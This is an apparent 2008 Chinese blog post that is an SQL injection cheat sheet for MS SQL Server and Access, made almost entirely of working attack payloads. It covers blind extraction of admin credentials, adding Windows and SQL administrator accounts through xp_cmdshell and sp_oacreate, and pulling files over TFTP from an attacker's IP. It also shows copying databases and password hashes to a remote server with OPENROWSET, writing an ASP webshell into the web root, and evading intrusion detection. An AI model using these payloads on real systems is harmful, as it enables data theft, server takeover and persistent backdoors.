问问你的心你有没有信心 做事情要专一坚定,执着
sql注入 1.判断有无注入点 ' ; and 1=1 and 1=2 1.1判断数据库类型 (select count(*) from sysobjects)>0 sysobjects(sql) msysobjects(access) 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0<>(select count(*) from *) and 0<>(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count(*) from admin) and 1<(select count(*) from admin) 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from admin where len(*)>0)-- and 1=(select count(*) from admin where len(用户字段名称name)>0) and 1=(select count(*) from admin where len(密码字段名称password)>0) 5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 and 1=(select count(*) from admin where len(*)>0) and 1=(select count(*) from admin where len(name)>6) 错误 and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 and 1=(select count(*) from admin where len(name)=6) 正确 and 1=(select count(*) from admin where len(password)>11) 正确 and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 and 1=(select count(*) from admin where len(password)=12) 正确 6.猜解字符 and 1=(select count(*) from admin where left(name,1)='a') ---猜解用户帐号的第一位 and 1=(select count(*) from admin where left(name,2)='ab')---猜解用户帐号的第二位 就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. 针对字符串类型的暴库,暴表 ' having 1=1-- ' group by users.id having 1=1-- ' group by users.id, users.username, users.password, users.privs having 1=1-- '; insert into users values( 666, 'attacker', 'foobar', 0xffff )-- ' union select sum(username) from login-- 可判断username列的数据类型 针对数字型 系统表information_schema.table饱含了系统中所有表的信息,这个表中的table_name字段包含了所有的表名 UNION SELECT TOP 1 TABLE_NAME,TABLE_NAME from INFORMATION_SCHEMA.TABLES- 错误中返回了一个表名:syssegments 说明当前数据库包含一个syssegments表,这是在建立数据库的时候系统自动生成的表,我们不关心,接下来继续提交: union select top 1 table_name,table_name from information_schema.tables where table_name not in('syssegments')- 返错暴表:login 然后利用information_schema.columns表中的column_name字段来得到login表中的字段名: union select top 1 column_name,column_name from information schema.columns where table_name='login'- 返错暴表:userid 可继续提交得到其他字段: union select top 1 column_name,column_name from information_schema.columns where table_name='login' and column_name not in('userid')- 可参考如下: UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'- UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')- UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')- UNION SELECT TOP 1 login_name FROM logintable- UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'-- 看服务器打的补丁=出错了打了SP4补丁 and 1=(select @@VERSION)-- 看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。 and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))-- 判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) and 'sa'=(SELECT System_user)-- and user_name()='dbo'-- and 0<>(select user_name()-- 看xp_cmdshell是否删除 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')-- xp_cmdshell被删除,恢复,支持绝对路径的恢复 ;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'-- ;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'-- 反向PING自己实验 ;use master;declare @s int;exec sp_oacreate "wscrīpt.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping";-- 加帐号 ;DECLARE @shell INT EXEC SP_OACREATE 'wscrīpt.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user semi$ 87624908 /add'-- 提升: ;DECLARE @shell INT EXEC SP_OACREATE 'wscrīpt.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net localgroup administratos semi$ /add'-- 创建一个虚拟目录E盘: ;declare @o int exec sp_oacreate 'wscrīpt.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscrīpt.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"'-- 访问属性:(配合写入一个webshell) declare @o int exec sp_oacreate 'wscrīpt.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscrīpt.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse' 爆库 特殊技巧::%5c='\' 或者把/和\ 修改%5提交 and 0<>(select top 1 paths from newtable)-- 得到库名(从1到5都是系统的id,6以上才可以判断) and 1=(select name from master.dbo.sysdatabases where dbid=7)-- and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 依次提交 dbid = 7,8,9.... 得到更多的数据库名 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表 假设为 admin and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) 来得到其他的表。 and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_id and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id',...)) 来暴出其他的字段 and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名 依次可以得到密码。。。。。假设存在user_id username ,password 等字段 and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address')) and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) 判断id值 and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段 ?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin ?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用) 得到WEB路径 ;create table [dbo].[swap] ([swappass][char](255));-- and (select top 1 swappass from swap)=1-- ;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)-- ;use ku1;-- ;create table cmd (str image);-- 建立image类型的表cmd 存在xp_cmdshell的测试过程: ;exec master..xp_cmdshell 'dir' ;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号 ;exec master.dbo.sp_password null,jiaoniang$,1866574;-- ;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- ;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- ;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';-- exec master..xp_servicecontrol 'start', 'schedule' 启动服务 exec master..xp_servicecontrol 'start', 'server' ; DECLARE @shell INT EXEC SP_OACREATE 'wscrīpt.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add' ;DECLARE @shell INT EXEC SP_OACREATE 'wscrīpt.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add' '; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- 利用TFTP上传文件 ;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\' ;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:\' ;declare @a;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat' 如果被限制则可以。 select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hax') 查询构造: SELECT * FROM news WHERE id=... AND topic=... AND ..... admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <>' select 123;-- ;use master;-- :a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。 and 1<>(select count(email) from [user]);-- ;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';-- ;update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';-- ';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';-- ';update [users] set email=(select top 1 count(id) from password) where name='ffff';-- ';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';-- ';update [users] set email=(select top 1 name from password where id=2) where name='ffff';-- 上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。 通过查看ffff的用户资料可得第一个用表叫ad 然后根据表名ad得到这个表的ID 得到第二个表的名字 insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-- insert into users values( 667,123,123,0xffff)-- insert into users values ( 123, 'admin''--', 'password', 0xffff)-- ;and user>0 ;and (select count(*) from sysobjects)>0 ;and (select count(*) from mysysobjects)>0 //为access数据库 枚举出数据表名 ;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);-- 这是将第一个表名更新到aaa的字段处。 读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>'刚才得到的表名')。 ;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');-- 然后id=1552 and exists(select * from aaa where aaa>5) 读出第二个表,一个个的读出,直到没有为止。 读字段是这样: ;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));-- 然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 ;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));-- 然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 [获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名] update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',…) 通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组] [获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名] update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段列如:1) [ where 条件] 绕过IDS的检测[使用变量] ;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\' ;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:\' 1、 开启远程数据库 基本语法 select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1' ) 参数: (1) OLEDB Provider name 2、 其中连接字符串参数可以是任何端口用来连接,比如 select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;', 'select * from table' 3.复制目标主机的整个数据库insert所有远程表到本地表。 基本语法: insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1') select * from table2 这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如: insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;','select * from table1') select * from table2 insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;','select * from _sysdatabases') select * from master.dbo.sysdatabases insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;','select * from _sysobjects') select * from user_database.dbo.sysobjects insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;','select * from _syscolumns') select * from user_database.dbo.syscolumns 复制数据库: insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;','select * from table1') select * from database..table1 insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;','select * from table2') select * from database..table2 复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下: insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;','select * from _sysxlogins') select * from database.dbo.sysxlogins 得到hash之后,就可以进行暴力破解。 遍历目录的方法: 先创建一个临时表:temp ';create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ';insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ';insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构,并寸入temp表中 ';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看某个文件的内容 ';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';-- ';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';-- ';insert into temp(id) exec master.dbo.xp_cmdshell 'cscrīpt C:\Inetpub\Adminscrīpts\adsutil.vbs enum w3svc' ';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- (xp_dirtree适用权限PUBLIC) 写入表: 语句1:and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- 语句2:and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));-- 语句3:and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));-- 语句4:and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));-- 语句5:and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));-- 语句6:and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));-- 语句7:and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));-- 语句8:and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));-- 语句9:and 1=(SELECT IS_MEMBER('db_owner'));-- 把路径写到表中去: ;create table dirs(paths varchar(100), id int)-- ;insert dirs exec master.dbo.xp_dirtree 'c:\'-- and 0<>(select top 1 paths from dirs)-- and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))-- ;create table dirs1(paths varchar(100), id int)-- ;insert dirs exec master.dbo.xp_dirtree 'e:\web'-- and 0<>(select top 1 paths from dirs1)-- 把数据库备份到网页目录:下载 ;declare @a sysname; set @a=db_name();backup database @a to disk='e:\web\down.bak';-- and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects) 参看相关表。 and 1=(select user_id from USER_LOGIN) and 0=(select user from USER_LOGIN where user>1) -=- wscrīpt.shell example -=- declare @o int exec sp_oacreate 'wscrīpt.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' '; declare @o int exec sp_oacreate 'wscrīpt.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'-- declare @o int, @f int, @t int, @ret int declare @line varchar(8000) exec sp_oacreate 'scrīpting.filesystemobject', @o out exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1 exec @ret = sp_oamethod @f, 'readline', @line out while( @ret = 0 ) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scrīpting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscrīpt.shell"): o.run( request.querystring("cmd") ) %>' declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to,us', 528 waitfor delay '00:00:05' '; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'-- xp_dirtree适用权限PUBLIC exec master.dbo.xp_dirtree 'c:\' 返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。 create table dirs(paths varchar(100), id int) 建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。 insert dirs exec master.dbo.xp_dirtree 'c:\' 只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
posted on 2008-06-11 23:13  王德田  阅读(250)  评论(0编辑  收藏  举报